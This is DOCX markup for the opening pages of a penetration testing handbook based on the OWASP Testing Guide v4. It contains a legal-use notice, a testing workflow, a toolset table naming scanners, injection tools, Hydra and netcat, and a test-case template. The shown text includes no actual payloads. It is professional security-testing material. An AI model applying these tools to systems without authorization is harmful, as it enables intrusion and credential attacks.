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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB APPLICATION PENETRATION TESTING HANDBOOK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Test-by-Test Execution Handbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="250"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Objectives, Tools, Step-by-Step Procedures, Commands &amp; Payloads, and Remediation for Every OTG Checklist Item</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800"/>
      </w:pP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2600"/>
        <w:gridCol w:w="7200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Source Checklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP-Testing_Checklist.xlsx (OWASP Testing Guide v4 Checklist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">11 Categories — 89 Individual Test Cases (OTG-INFO through OTG-CLIENT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Technical Testing Handbook / Execution Playbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Audience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Penetration Testers, Application Security Engineers, QA/Security Trainees</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">For Authorized Security Testing Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="650"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C00000" w:sz="6"/>
          <w:left w:val="single" w:color="C00000" w:sz="6"/>
          <w:bottom w:val="single" w:color="C00000" w:sz="6"/>
          <w:right w:val="single" w:color="C00000" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FDEEEE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="130"/>
              <w:left w:type="dxa" w:w="170"/>
              <w:bottom w:type="dxa" w:w="130"/>
              <w:right w:type="dxa" w:w="170"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Legal &amp; Ethical Use Notice</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This handbook operationalizes the OWASP Testing Guide v4 checklist into step-by-step procedures, example commands, and payloads. Every technique described must be performed only against systems you own or for which you hold explicit, documented, written authorization (a signed penetration testing agreement / rules of engagement). Unauthorized use of these techniques against any system is illegal under computer misuse laws in most jurisdictions. This handbook is for authorized security assessment and professional education only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId7"/>
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1440" w:right="1350" w:bottom="1440" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction &amp; How to Use This Handbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The OWASP Testing Guide (OTG) v4 provides the industry-standard checklist for comprehensively assessing the security of a web application. This handbook expands the source checklist — which lists each test's ID, name, short description, and tools — into a full execution playbook: every test case now includes a clear testing objective, the exact tools to use, a step-by-step testing procedure, representative commands or payloads to run, and concrete remediation guidance to include in the final report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The handbook is organized into the same eleven categories as the source checklist, in the same order, and every test retains its original OTG identifier so findings can be tracked directly back to the checklist and to the OWASP Testing Guide's own reference documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended Testing Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scoping &amp; Authorization — confirm written authorization (rules of engagement), scope boundaries, and testing window before any active testing begins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Gathering (Category 1) — always start here; findings shape every later category.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration &amp; Deployment Review (Category 2) — assess the platform before testing application logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identity, Authentication, Authorization &amp; Session Management (Categories 3–6) — test the access-control backbone of the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Validation (Category 7) — the largest category; budget the most time here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Error Handling &amp; Cryptography (Categories 8–9) — typically fast to assess once other categories are complete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Business Logic (Category 10) — requires manual, application-specific analysis; cannot be automated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Client-Side Testing (Category 11) — assess browser-executed risk last, once server-side behavior is understood.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Record every result (Not Started / Pass / Issues) against the original checklist and capture evidence for each finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Score every confirmed finding using the OWASP Risk Rating methodology (see Appendix) and compile the final report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Toolset Referenced Throughout</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3000"/>
        <w:gridCol w:w="6800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Intercepting Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp Suite (Community/Professional), OWASP ZAP — used in nearly every category to inspect and modify HTTP(S) traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap, dnsrecon, fierce, Shodan, theHarvester, WhatWeb, Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Injection Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLMap, NoSQLMap, Commix, Wfuzz, ffuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Nessus, Nikto, OpenVAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">testssl.sh, SSL Labs, Nmap ssl-enum-ciphers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">curl, wget, netcat — used throughout for direct, precise HTTP interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">How Each Test Case Is Presented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Every test in this handbook follows an identical structure so it can be used as a repeatable, checklist-driven playbook during live engagements:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG ID and Test Name — exactly as listed in the source checklist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools — the recommended tool(s) for this specific test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective — what the test is verifying and why it matters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Procedure — the exact sequence of steps to execute the test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
